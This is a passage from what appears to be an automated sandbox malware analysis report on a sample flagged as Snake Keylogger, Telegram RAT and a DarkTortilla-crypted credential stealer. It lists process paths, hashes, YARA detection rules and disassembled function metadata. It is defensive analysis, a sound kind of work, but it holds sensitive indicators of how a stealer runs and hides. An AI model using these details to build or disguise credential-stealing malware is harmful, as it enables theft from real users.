00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	15:24:52
Start date:	18/08/2024
Path:	C:\Users\user\AppData\Roaming\xxlooa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xxlooa.exe"
Imagebase:	0x250000
File size:	2'387'968 bytes
MD5 hash:	8B4E3A62D01F4D0CF638607B5E7FB2A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.2709059333.0000000002806000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.2721219524.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.2721219524.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:25:06
Start date:	18/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x600000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2962597104.0000000005138000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.1%
Total number of Nodes:	235
Total number of Limit Nodes:	10

Executed Functions

Function 02AAB9B5 Relevance: 23.0, Strings: 18, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 02AABDA8
Zcq, xrefs: 02AABD14
Te^q, xrefs: 02AABF6A
Te^q, xrefs: 02AAC063
Zcq, xrefs: 02AABFE1
Te^q, xrefs: 02AABD86
Zcq, xrefs: 02AABD04
Zcq, xrefs: 02AABFD1
Zcq, xrefs: 02AABCC2
Zcq, xrefs: 02AAC00D
Te^q, xrefs: 02AABDB4
Te^q, xrefs: 02AABF7A
Te^q, xrefs: 02AAC039
$, xrefs: 02AABC5F
Ycq, xrefs: 02AABDC3
Zcq, xrefs: 02AABCD2
Zcq, xrefs: 02AABD70
Zcq, xrefs: 02AABD41

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Ycq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$$
API String ID: 0-3077109731
Opcode ID: c03fdf27cb0574d3c2142f09ce052e2582fb7a6b2388f2617ff6fa1927d16024
Instruction ID: 2ab97abf13cd80e93db45b5bb297b660f6e6d6c3f89136fb8c49b2630cba6c5c
Opcode Fuzzy Hash: c03fdf27cb0574d3c2142f09ce052e2582fb7a6b2388f2617ff6fa1927d16024
Instruction Fuzzy Hash: 82026330740204DFEB089B69D965B7E66E7AFC8704F14882AA506DB3D8DF75DC42CB61

Function 02AA89F0 Relevance: 12.2, Strings: 9, Instructions: 985COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02AA8B81
,bq, xrefs: 02AA8F3A
(o^q, xrefs: 02AA8F99
(o^q, xrefs: 02AA9059
(o^q, xrefs: 02AA8BAD
,bq, xrefs: 02AA8F2A
(o^q, xrefs: 02AA8AC6
(o^q, xrefs: 02AA8FA9
(o^q, xrefs: 02AA8C4A

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2735749406
Opcode ID: f49f6d8dfbe25b31528c0e5a459cd8a89376438bd435bd92cf0812a68389ba9d
Instruction ID: 27f50ec782234223fe0663d5a66a91c00d81d92b1a23adecadcc1e9158964a26
Opcode Fuzzy Hash: f49f6d8dfbe25b31528c0e5a459cd8a89376438bd435bd92cf0812a68389ba9d
Instruction Fuzzy Hash: A4926B30A0020ADFCB15CF69C594AAEBBF2FF88314F158569E41A9B3A5DB34ED45CB50

Function 07C11BD4 Relevance: 5.6, Instructions: 5557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1853733202.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e96c25ff7a9994282867d79d3173eb1427313f1a0b090e43b7cf58bdb9b8ff3
Instruction ID: 179c65c56dbda34e49888c4c4879b09105c12d254c42f577590165b1cb388452
Opcode Fuzzy Hash: 5e96c25ff7a9994282867d79d3173eb1427313f1a0b090e43b7cf58bdb9b8ff3
Instruction Fuzzy Hash: 9EB30670A11218CBCB58EF39D99966DBBF2FB89314F0085E9D44DA7250DE349E89CF42

Function 07C11BF8 Relevance: 5.5, Instructions: 5545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1853733202.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ee02576c93d8b8429696603b12a13f5a72aade6dc32eac8de917e4117257a6
Instruction ID: bea132a9bd7129fdbec2de6a694445ecf1d43486b68de67644e8a32cc630a7a0
Opcode Fuzzy Hash: b7ee02576c93d8b8429696603b12a13f5a72aade6dc32eac8de917e4117257a6
Instruction Fuzzy Hash: 68B30670A11218CBCB58EF39D99966DBBF2FB89314F0085E9D44DA7250DE349E89CF42

Function 073526F8 Relevance: 5.2, Instructions: 5226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1851533836.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7350000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b1a1f79314978240589cb2cfdd22beb9c8f56d4ab432a85327b2d514ccd257b
Instruction ID: 23dd8b4061c36d1ff4cc1076fbd535f61c31ed7b03ffd04eeb3045bb2e9279d3
Opcode Fuzzy Hash: 6b1a1f79314978240589cb2cfdd22beb9c8f56d4ab432a85327b2d514ccd257b
Instruction Fuzzy Hash: 07B30C70A11219CBDB58EF39D9996ACBBF6FB84304F0085E9D488A7250DF345E89CF85

Function 02AA7DD8 Relevance: 3.1, Strings: 2, Instructions: 564COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02AA8302
Hbq, xrefs: 02AA81CE

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 3119b3ff6016acb39d77a18af670ffbe228c93eaa4f344c16c0d0a61ddc5fcf0
Instruction ID: 1f53e86066fe7c766e92040a1d07c9f0bcd90efe0afb5b8f1e1dd965f960cefe
Opcode Fuzzy Hash: 3119b3ff6016acb39d77a18af670ffbe228c93eaa4f344c16c0d0a61ddc5fcf0
Instruction Fuzzy Hash: 12227C70A002199FCB14DF69C894AAEBBF6FF88304F148569E909DB395DF389D45CB90

Function 07C35F26 Relevance: 2.8, Instructions: 2771COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1853822955.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3a3191e863e216829a2473b50f9900919d5cb2c228339f879404e208871115
Instruction ID: c9c232f6cfba9e4fc96dadd73392a97e12dc66a9cd36e822f6ee5f6e25ed7633
Opcode Fuzzy Hash: ef3a3191e863e216829a2473b50f9900919d5cb2c228339f879404e208871115
Instruction Fuzzy Hash: 7A334EB0A112288BC754FF79D98976DB7B1FB88704F4085A9E48CA7340DE389E85CF56

Function 07359D78 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

Xbq, xrefs: 07359DA7
$^q, xrefs: 07359D8E

Memory Dump Source

Source File: 00000000.00000002.1851533836.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7350000_File.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: bd193adc4a6cb858a652a1571512855a72518ef8013917173f811e8a3a33c267
Instruction ID: 1c771bdbb3e00c371a8649877e651534998f82a6b27caf2583ff5e771fed21cb
Opcode Fuzzy Hash: bd193adc4a6cb858a652a1571512855a72518ef8013917173f811e8a3a33c267
Instruction Fuzzy Hash: 678175B5B102188FDB18AB79985877E7BB7BFC4700F14852AD407E7298CE359C029792

Function 07342698 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1851463299.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a64b7cd490f085aae6749281eaab89f73a4234231479ef1e293c5cce689c3232
Instruction ID: 63a1f311b18f3ebda34f061ac29a250296dd1d2485aab70a4ae35b2201747965
Opcode Fuzzy Hash: a64b7cd490f085aae6749281eaab89f73a4234231479ef1e293c5cce689c3232
Instruction Fuzzy Hash: 22527A74A003458FDB14DF28C844B99B7B2FF89314F2582A9D4586F3A2DB71A986CF81

Function 073426C8 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1851463299.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cdde6ac71eef9f0179060e32216bac019a3bb634363033dd0cc10a8c0141ff5
Instruction ID: 2cc923ed4e87b08e931c042a44031df9ec50abb9d6fdb561adc2c570bbb6e050
Opcode Fuzzy Hash: 9cdde6ac71eef9f0179060e32216bac019a3bb634363033dd0cc10a8c0141ff5
Instruction Fuzzy Hash: E2526974A002458FDB14DF28C944B99B7B2FF89314F2186A9D45C6F3A2DB71A986CF81

Function 096CD6E8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1854496340.00000000096C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96c0000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ae3dd0e9609eb48fe2bc8ea32958fdadf2fb9a328f7b0004b2614c936582bc
Instruction ID: 1da901bec073afbe9e0ecfc9aa8e2c7ae64eb4f87df91a8af364fe1036bddb33
Opcode Fuzzy Hash: a6ae3dd0e9609eb48fe2bc8ea32958fdadf2fb9a328f7b0004b2614c936582bc
Instruction Fuzzy Hash: D212A6B0C827458BE310CF65E94C1893BB1BB45319BE04E09D2A29F2E1DFB8916BCF54

Function 096CD6D8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1854496340.00000000096C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96c0000_File.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7d6c873c188400a7f36db2cf3f2e4c07eabccd5c901b3305b6c4ecd722fdc1
Instruction ID: 0535f3e6b481f832076a03ad62384eb32dbeb5692c2d68359d762111c731b9f7
Opcode Fuzzy Hash: dd7d6c873c188400a7f36db2cf3f2e4c07eabccd5c901b3305b6c4ecd722fdc1
Instruction Fuzzy Hash: 6AC10AB0C827468BD710CF65E84C2897BB1BB85319FE04E19D1A2AB2E0DFB49567CF54

Function 02AAA0F0 Relevance: 27.8, Strings: 22, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 02AAA342
TJcq, xrefs: 02AAA70D
$^q, xrefs: 02AAA1C8
LR^q, xrefs: 02AAA3F0
$^q, xrefs: 02AAA480
Te^q, xrefs: 02AAA7D1
Te^q, xrefs: 02AAA7F3
TJcq, xrefs: 02AAA747
XX^q, xrefs: 02AAA5A2
TJcq, xrefs: 02AAA737
LR^q, xrefs: 02AAA3FE
$^q, xrefs: 02AAA433
TJcq, xrefs: 02AAA6FD
TJcq, xrefs: 02AAA620
TJcq, xrefs: 02AAA57D
XX^q, xrefs: 02AAA592
Te^q, xrefs: 02AAA606
Te^q, xrefs: 02AAA803
TJcq, xrefs: 02AAA612
LR^q, xrefs: 02AAA334
$^q, xrefs: 02AAA470
$^q, xrefs: 02AAA443

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$LR^q$LR^q$TJcq$TJcq$TJcq$TJcq$TJcq$TJcq$TJcq$Te^q$Te^q$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-4264001609
Opcode ID: 57d5abd701bed84c65a264ca1c727193b2cf5f735d995dc6ccc5d348ee43cc35
Instruction ID: 9cca5692f8ab903b8fd73a49700e0ea009dfdfbac48503ff156dfefd51e3401f
Opcode Fuzzy Hash: 57d5abd701bed84c65a264ca1c727193b2cf5f735d995dc6ccc5d348ee43cc35
Instruction Fuzzy Hash: 9CB14C74F04118DFCB19CF99D594AADB7F2BF88300F148516E806AB355DB34AC85CB91

Function 096CAD18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 096CADA6
GetCurrentThread.KERNEL32 ref: 096CADE3
GetCurrentProcess.KERNEL32 ref: 096CAE20
GetCurrentThreadId.KERNEL32 ref: 096CAE79

Strings

Xv, xrefs: 096CAD64
hDv, xrefs: 096CAE64

Memory Dump Source

Source File: 00000000.00000002.1854496340.00000000096C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96c0000_File.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Xv$hDv
API String ID: 2063062207-2691937906
Opcode ID: b63b20408976172250c486de0998a9f424925c66f450e056a8f4c8c1dd46fa3c
Instruction ID: c566fc6e135bd1c5538cab8e68b23fa7d3007e7e26e6a672279656f55ddb637a
Opcode Fuzzy Hash: b63b20408976172250c486de0998a9f424925c66f450e056a8f4c8c1dd46fa3c
Instruction Fuzzy Hash: 835137B19007498FDB54DFAAD5487EEBBF1EB48304F20C469E449A7360DB34A984CF65

Function 096CAD28 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 096CADA6
GetCurrentThread.KERNEL32 ref: 096CADE3
GetCurrentProcess.KERNEL32 ref: 096CAE20
GetCurrentThreadId.KERNEL32 ref: 096CAE79

Strings

Xv, xrefs: 096CAD64
hDv, xrefs: 096CAE64

Memory Dump Source

Source File: 00000000.00000002.1854496340.00000000096C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96c0000_File.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Xv$hDv
API String ID: 2063062207-2691937906
Opcode ID: 26ac2efae003ef4f26087bd82c50d24c31bd3d1cb2d5cc2b62edbc3da4dc3971
Instruction ID: 387e64f0354401be6447775136f857690d4fe9c472510df96ac50a460bb965bf
Opcode Fuzzy Hash: 26ac2efae003ef4f26087bd82c50d24c31bd3d1cb2d5cc2b62edbc3da4dc3971
Instruction Fuzzy Hash: 9B5137B19003498FDB54DFAAD548BAEBBF1EB48304F20C469E449A7360D7346984CF65

Function 02AAA4F0 Relevance: 10.2, Strings: 8, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJcq, xrefs: 02AAA6FD
Te^q, xrefs: 02AAA7D1
Te^q, xrefs: 02AAA7F3
TJcq, xrefs: 02AAA57D
XX^q, xrefs: 02AAA592
Te^q, xrefs: 02AAA606
TJcq, xrefs: 02AAA612
TJcq, xrefs: 02AAA737

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: TJcq$TJcq$TJcq$TJcq$Te^q$Te^q$Te^q$XX^q
API String ID: 0-769504750
Opcode ID: 312c32ed9bb3b8d18ea3b78846b061f70a345fbf1f473ba6a16968fa29afcdea
Instruction ID: 9548e0e81329fce817e881cdf84f81b62446d63f5c907aedcfc0bc106fe0e9a4
Opcode Fuzzy Hash: 312c32ed9bb3b8d18ea3b78846b061f70a345fbf1f473ba6a16968fa29afcdea
Instruction Fuzzy Hash: 7D719D30B00105DFDB149BA9D9A8BAEB7F2EF88710F14442AE502EB396DF709C45CB95

Function 02AAA500 Relevance: 10.2, Strings: 8, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJcq, xrefs: 02AAA6FD
Te^q, xrefs: 02AAA7D1
Te^q, xrefs: 02AAA7F3
TJcq, xrefs: 02AAA57D
XX^q, xrefs: 02AAA592
Te^q, xrefs: 02AAA606
TJcq, xrefs: 02AAA612
TJcq, xrefs: 02AAA737

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: TJcq$TJcq$TJcq$TJcq$Te^q$Te^q$Te^q$XX^q
API String ID: 0-769504750
Opcode ID: 2ed13609a04c3b28b1e42ed4ad1567105188fc4d1aa5df065ce449435f144277
Instruction ID: e0e918b33da6da51adbb9026c533bd3c024e863f3d8b9ced71c58e1e4e4993d6
Opcode Fuzzy Hash: 2ed13609a04c3b28b1e42ed4ad1567105188fc4d1aa5df065ce449435f144277
Instruction Fuzzy Hash: 3C619D30B40105DFDB149B69D9B8BAEB7F2AF88700F14442AE502EB392DF709C45CB95

Function 02AA85E9 Relevance: 5.3, Strings: 4, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02AA8648
,bq, xrefs: 02AA86C0
(o^q, xrefs: 02AA863A
,bq, xrefs: 02AA86B2

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: e440caef736c8f98edb420cdd12f057cd19290bca66679a6de88135ab87fa591
Instruction ID: 8c7e6b275b2014f81c858e8a4d7f2afde6b069e195730b6e23a189d612516eff
Opcode Fuzzy Hash: e440caef736c8f98edb420cdd12f057cd19290bca66679a6de88135ab87fa591
Instruction Fuzzy Hash: 95C12C70A00105DFDB14CFA9C8A8AADBBB2FF89345F158169E415AB265DF38EC41CB51

Function 07C10895 Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

S@, xrefs: 07C10984
Te^q, xrefs: 07C109A7
TJcq, xrefs: 07C109BC

Memory Dump Source

Source File: 00000000.00000002.1853733202.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_File.jbxd

Similarity

API ID:
String ID: S@$TJcq$Te^q
API String ID: 0-991611162
Opcode ID: ef184acec3bdd5135d79807cb93d86de6cd0f2ba4aa9063dbbbd54cd5338df36
Instruction ID: a71f649551e9aa1bf4fc845f48e37b10c814986e62c548d95aa021f73c80882a
Opcode Fuzzy Hash: ef184acec3bdd5135d79807cb93d86de6cd0f2ba4aa9063dbbbd54cd5338df36
Instruction Fuzzy Hash: 9E510BA264E3C10FD7139B745C795997FB29E83114B1E04EBC5C6CB2A3E56C880AC767

Function 02AA5CB0 Relevance: 3.9, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AA5E0F
$^q, xrefs: 02AA5DAE
$^q, xrefs: 02AA5DBE

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 212b9a6cf96c4d58c90584766ab0361bbfdcaba96c1a928a89610ea88ec84641
Instruction ID: 3869cb258c396cf8e7f483bf8514399d2b9e1d36d6c82a81290ca76b02a272c9
Opcode Fuzzy Hash: 212b9a6cf96c4d58c90584766ab0361bbfdcaba96c1a928a89610ea88ec84641
Instruction Fuzzy Hash: 2841A130F002189FDB14DFB9C8A8BAA77F6BF89300F544869E106AB2A5DF319C45CB55

Function 02AA7410 Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

Hbq, xrefs: 02AA75E1
Hbq, xrefs: 02AA7614

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 952a458a43665d2652da07405a1de9ff94287d8e3fe6d0d713632e4ff3e0c158
Instruction ID: a90806f0e65e6ebd62b6a3b384ecb298ee44a04376bd8f01be94fa2a766bf7ef
Opcode Fuzzy Hash: 952a458a43665d2652da07405a1de9ff94287d8e3fe6d0d713632e4ff3e0c158
Instruction Fuzzy Hash: 52E19C307001159FCB05AF29C8A8B7EBBA6BF88315F14846AE90ACB395DF34DD41CB91

Function 07C1BA9C Relevance: 2.9, Strings: 2, Instructions: 351COMMON

Download Yara Rule

Strings

H@, xrefs: 07C1BAB4
F, xrefs: 07C1BB4A

Memory Dump Source

Source File: 00000000.00000002.1853733202.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_File.jbxd

Similarity

API ID:
String ID: F$H@
API String ID: 0-698397363
Opcode ID: 4cdfb559c5208db4a58bcbffe38bd8bbe13e3ea441232c7d6c1608da7ab4def4
Instruction ID: 0e232dc225fc17c679ebb372b9685afb730b63ab691e117e2519a23d46fb9db7
Opcode Fuzzy Hash: 4cdfb559c5208db4a58bcbffe38bd8bbe13e3ea441232c7d6c1608da7ab4def4
Instruction Fuzzy Hash: 6AC1F9B0A083548FC705EFB9D89476DBFB1FF46704F0545AAE485D7292DA389C06C762

Function 0734B060 Relevance: 2.8, Strings: 2, Instructions: 308COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0734B34C
PH^q, xrefs: 0734B1DE

Memory Dump Source

Source File: 00000000.00000002.1851463299.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_File.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: fd8e60f58828984662c0b727b3a9f04f142bb82373785e3421ad7bc5fb0b3fc1
Instruction ID: 9ce155144ce11d48a7774b9e60ce5952a2839e963b568360899fe1d9fbd7d1c7
Opcode Fuzzy Hash: fd8e60f58828984662c0b727b3a9f04f142bb82373785e3421ad7bc5fb0b3fc1
Instruction Fuzzy Hash: 1DC107B4600215CFDB18DF68D998A9DBBF2FF89310F1545A9E40AAB3A1DB31EC45CB50

Function 02AA7B00 Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

,bq, xrefs: 02AA7BD6
,bq, xrefs: 02AA7BE0

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 2080c72e9e49e911fd8558dd28bc9acb2d20e8b38b61308162e11c25a37360be
Instruction ID: ed8347d439d235e5bcf9f8e6125ee9df5c86e2e6796562077b3c6b02ce8bedeb
Opcode Fuzzy Hash: 2080c72e9e49e911fd8558dd28bc9acb2d20e8b38b61308162e11c25a37360be
Instruction Fuzzy Hash: 70718E74A006058FCB14CF69CCA4AAFF7B2BF89214B158569D406AB3A5DF31E841CF91

Function 073425D0 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

(bq, xrefs: 07343C12
Hbq, xrefs: 07343D30

Memory Dump Source

Source File: 00000000.00000002.1851463299.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_File.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 04c7f1d02c829ec0fb452710a6981294cc1d2025dc4041f1dd32af22ba732b29
Instruction ID: 9dff2473fd915beb9652312789e95c3d89bf8faa260bfe63ff88a114b9008513
Opcode Fuzzy Hash: 04c7f1d02c829ec0fb452710a6981294cc1d2025dc4041f1dd32af22ba732b29
Instruction Fuzzy Hash: B05107B16041519FE71DAF38C4505A9BBF6FFC6300B2985AAD04DAB751CB31BC42C791

Function 02AA5628 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

8bq, xrefs: 02AA566D
8bq, xrefs: 02AA5679

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: 8bq$8bq
API String ID: 0-1276831224
Opcode ID: a80e94d8c52005746f23ce20191f3540c137825998d6f08cd465bc4d2659fdee
Instruction ID: 20655518c2669e4d8a3fa4688d1d90c682d387e73a5d1b19bfc247c368441019
